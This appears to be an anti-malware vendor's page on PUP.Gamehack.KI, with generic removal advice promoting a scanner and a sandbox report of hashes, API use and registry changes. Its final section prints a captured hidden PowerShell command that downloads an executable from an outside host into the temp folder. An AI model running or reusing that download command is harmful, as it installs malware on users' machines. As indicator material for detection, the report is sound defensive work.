PUP.Gamehack.KI

The detection of PUP.Gamehack.KI on your system indicates the presence of a potentially unwanted program (PUP) that may be causing issues with your computer's performance and security. It's essential to understand the nature of this threat and take immediate action to remove it to prevent any further damage.

What Is PUP.Gamehack.KI?

PUP.Gamehack.KI is a type of potentially unwanted program that may have been installed on your system without your knowledge or consent. PUPs are software applications that may not be malicious in nature but can still cause problems with your computer's performance, stability, and security. They often bundled with other software or downloaded from untrusted sources, and can be difficult to remove without proper tools and techniques.

How PUP.Gamehack.KI Operates

PUPs like PUP.Gamehack.KI typically operate by installing themselves on your system and then running in the background, often without your knowledge or consent. They may collect data about your browsing habits, search history, and other personal information, which can be used for targeted advertising or other malicious purposes. They may also consume system resources, causing your computer to slow down or become unresponsive. In some cases, PUPs can also download and install additional malware or unwanted software, further compromising your system's security.

Symptoms of Infection

If your system is infected with PUP.Gamehack.KI, you may notice a range of symptoms, including slow system performance, unwanted pop-ups and advertisements, and changes to your browser settings or homepage. You may also notice that your system is running slowly or is unresponsive, or that your browser is redirecting you to unwanted websites. In some cases, you may also notice that your system is crashing or freezing frequently, or that you are experiencing other issues with your computer's stability and security.

How to Remove PUP.Gamehack.KI

  1. Boot your system in Safe Mode with Networking to prevent the PUP from running and to give you a clean environment to work in.
  2. Download and install a reputable anti-malware tool, such as SpyHunter, and run a full scan of your system to detect and remove any malware or unwanted software.
  3. Uninstall any suspicious programs or software that you do not recognize or need, as these may be related to the PUP infection.
  4. Reset your browser settings to their default values, including Chrome, Firefox, and Edge, to remove any changes made by the PUP.
  5. Reboot your system and run another scan with your anti-malware tool to ensure that the PUP has been completely removed and that your system is clean.

Conclusion

Removing PUP.Gamehack.KI from your system requires a combination of technical knowledge and the right tools. By following the steps outlined above, you can help to ensure that your system is clean and free from malware. It's also essential to take steps to prevent future infections, such as being cautious when downloading software, avoiding untrusted sources, and keeping your operating system and software up to date. By taking these precautions, you can help to protect your system and your personal data from the risks associated with PUPs like PUP.Gamehack.KI.

Analysis Report

General information

Family Name: PUP.Gamehack.KI
Signature status: No Signature

Known Samples

MD5: 95f2cb15e5f017c4018e5922556c5e1c
SHA1: b568219807df4e2edee283e86754ab64d9161534
SHA256: 9EAA2786693424A19BF7A16CF97BB98019E479F1A4BABCA4FAE722437A678C4D
File Size: 537.60 KB, 537600 bytes
MD5: 035cee2001608233bd8340b5b66dd45e
SHA1: 224f586ff9e5daabc24842632e363207ea5c42fc
SHA256: 9BC59FD2AFF61ABA23C80663FB0A9BBEFBE6065ACBAD12BE7C229836DDB8CD6E
File Size: 708.10 KB, 708096 bytes
MD5: 9c07845e2084d4e3479e8ecd34c487d8
SHA1: a92d036a1aff16002bb6d66480fa2c8a479bbc86
SHA256: 3C63C7A05C59A603E1A31D6D6358ED587E8F5C315F5EF7BF8EE8035A2077E955
File Size: 711.17 KB, 711168 bytes
MD5: 49440fff3cb4105b4bba505afab31626
SHA1: 1d15b30b8f0c33f6b1dfc71589014c993db0155c
SHA256: DAFB539E49493261D3FEA83492A3C3917B6228116ED927A420DCEED50E46DD91
File Size: 526.85 KB, 526848 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has TLS information
  • File is 64-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
Show More
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

  • dll
  • imgui
  • No Version Info
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 295
Potentially Malicious Blocks: 50
Whitelisted Blocks: 239
Unknown Blocks: 6

Visual Map

0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 x 0 0 0 0 0 0 x 0 0 1 x 1 0 0 x 0 x 0 x 0 x 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 x 0 0 x 0 0 0 0 x 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 x 0 0 x x 0 0 0 0 0 x 0 x x 0 x x 0 0 x 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 x x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x x 0 0 x 0 0 0 0 0 x x x x 0 0 0 0 0 x 0 0 x 0 0 x 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 x 0 x x ? 0 x 0 0 ? 0 x 0 0 ? ? 0 0 0 0 0 0 0 0 ? 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • Kryptik.ODFF
  • RobloxHack.LE
  • RobloxStealer.B

Files Modified

File Attributes
\device\namedpipe\pshost.134222832962244677.6148.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\temp\__psscriptpolicytest_0to0bhxn.yoh.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_c1vnpa1w.0oe.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_c5dkfjt2.zjp.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_wmqprstw.hbe.psm1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe p0����� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe k���� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe �e���� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ����� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe uI-��� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe _7P-��� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe  �-��� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe �n�-��� RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
Show More
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl

24 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe